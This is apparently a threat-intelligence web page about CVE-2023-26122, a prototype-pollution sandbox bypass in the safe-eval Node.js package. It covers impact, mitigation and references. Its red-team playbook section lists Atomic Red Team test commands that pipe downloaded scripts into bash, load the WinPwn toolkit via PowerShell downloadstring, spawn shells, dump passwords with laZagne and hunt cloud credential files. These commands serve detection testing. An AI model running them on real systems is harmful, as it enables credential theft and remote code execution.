CVE-2023-26122
Overview
This vulnerability is a sandbox bypass resulting from prototype pollution within the safe-eval package. The root cause lies in improper input sanitization that allows manipulation of JavaScript object prototypes. Specific functions such as __defineGetter__, stack(), toLocaleString(), propertyIsEnumerable.call(), and valueOf() are affected, enabling attackers to subvert the intended sandbox restrictions.
Vulnerability Description
All versions of the package safe-eval are vulnerable to Sandbox Bypass due to improper input sanitization. The vulnerability is derived from prototype pollution exploitation. Exploiting this vulnerability might result in remote code execution ("RCE"). **Vulnerable functions:** __defineGetter__, stack(), toLocaleString(), propertyIsEnumerable.call(), valueOf().
Impact
An attacker with network access and limited privileges can exploit this vulnerability to execute arbitrary code remotely within the Node.js environment running safe-eval. The exploit requires no user interaction and leverages prototype pollution to bypass sandbox restrictions, potentially resulting in full system compromise. The CVSS vector (AV:N/AC:L/PR:L/UI:N) indicates low attack complexity and no user interaction, elevating the risk of remote code execution and data breach.
Solution
Users should upgrade safe-eval to a patched version as recommended in the Snyk advisory (SNYK-JS-SAFEEVAL-3373064) and monitor the GitHub repository issue #27 for vendor updates. The advisory provides detailed instructions for mitigation and patching. No official vendor patch version is specified, so applying community fixes or replacing safe-eval with alternative secure evaluation methods is advised.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability in the safe-eval package stems from a critical flaw in input sanitization, allowing for prototype pollution exploitation. This occurs when an attacker can manipulate an object's prototype, thereby altering the behavior of all instances of that object. Specifically, the functions __defineGetter__, stack(), toLocaleString(), propertyIsEnumerable.call(), and valueOf() are particularly susceptible. When these functions are improperly handled, they can be leveraged to inject malicious properties into the prototype chain, leading to unexpected behaviors in the application. This manipulation can ultimately facilitate remote code execution, where an attacker gains the ability to execute arbitrary code on the server or client-side environment.
Attack vectors exploiting this vulnerability are diverse and can be executed in various scenarios. For instance, an attacker could craft a payload that targets an application utilizing the safe-eval package, embedding malicious input that exploits the prototype pollution flaw. Once the payload is processed, the attacker could gain control over the application's execution context, leading to unauthorized access to sensitive data or the ability to perform actions on behalf of legitimate users. Additionally, if the application is part of a larger ecosystem or interacts with other services, the implications of such an exploit could extend beyond the immediate target, affecting interconnected systems and data integrity.
The real-world impact of this vulnerability is profound, particularly for organizations that rely on the safe-eval package for executing JavaScript code in a controlled environment. Given the critical nature of the flaw, businesses face significant risks, including data breaches, loss of customer trust, and potential legal ramifications. The ability for an attacker to execute arbitrary code can lead to unauthorized access to sensitive information, manipulation of application logic, or even the deployment of malware within the organization's infrastructure. The financial implications of such incidents can be severe, encompassing remediation costs, regulatory fines, and reputational damage.
To detect and mitigate the risks associated with this vulnerability, organizations should implement a multi-faceted approach. First, regular code reviews and security assessments should be conducted to identify and remediate instances of the safe-eval package in their codebase. Automated tools can assist in scanning for known vulnerabilities and ensuring that all dependencies are up-to-date. Additionally, input validation and sanitization practices must be reinforced to prevent malicious payloads from being processed. Employing security best practices, such as using a Web Application Firewall (WAF) and monitoring for unusual application behavior, can further enhance an organization's defense against exploitation attempts.
In conclusion, the vulnerability within the safe-eval package represents a significant threat to applications that utilize it, primarily due to its potential for remote code execution through prototype pollution. Organizations must remain vigilant, adopting proactive measures to detect and mitigate this risk. By prioritizing secure coding practices, conducting thorough security assessments, and maintaining awareness of emerging threats, businesses can better protect themselves against the exploitation of such vulnerabilities and safeguard their digital assets.
CSURFACE threat intelligence has detected a measurable increase in the Exploit Prediction Scoring System (EPSS) score for CVE-2023-26122, reflecting a 25% rise over the past week. Although no new exploit techniques or proof-of-concept codes have surfaced in our telemetry, this upward trend in EPSS suggests growing interest or preparatory activity by threat actors targeting the safe-eval package. The increase, while not indicative of a rapid escalation, elevates the likelihood of exploitation attempts in the near term. For defenders, this shift underscores the necessity to heighten monitoring and detection capabilities around environments utilizing safe-eval, as the vulnerability’s critical severity combined with a rising EPSS score signals an increased risk posture. Consequently, the threat level should be considered elevated from stable to cautiously heightened, warranting continued vigilance despite the absence of confirmed active exploitation campaigns.
Affected Products (1)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Safe-Eval Project | Safe-Eval | All |
cpe:2.3:a:safe-eval_project:safe-eval:*:*:*:*:*:node.js:*:*
|
Exploits
No exploits found for this CVE.
Threat Feed
0 eventsNo threat activity recorded for this CVE.
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
Red Team Playbook
44 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (9)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2023-26122 |
| security.snyk.io |
GitHub CVE
|
https://security.snyk.io/vuln/SNYK-JS-SAFEEVAL-3373064 |
| github.com |
GitHub CVE
|
https://github.com/hacksparrow/safe-eval/issues/27 |
| gist.github.com |
GitHub CVE
|
https://gist.github.com/seongil-wi/2db6cb884e10137a93132b7f74879cce |
| github.com |
GitHub CVE
|
https://github.com/hacksparrow/safe-eval/issues/31 |
| github.com |
GitHub CVE
|
https://github.com/hacksparrow/safe-eval/issues/32 |
| github.com |
GitHub CVE
|
https://github.com/hacksparrow/safe-eval/issues/33 |
| github.com |
GitHub CVE
|
https://github.com/hacksparrow/safe-eval/issues/34 |
| github.com |
GitHub CVE
|
https://github.com/hacksparrow/safe-eval/issues/35 |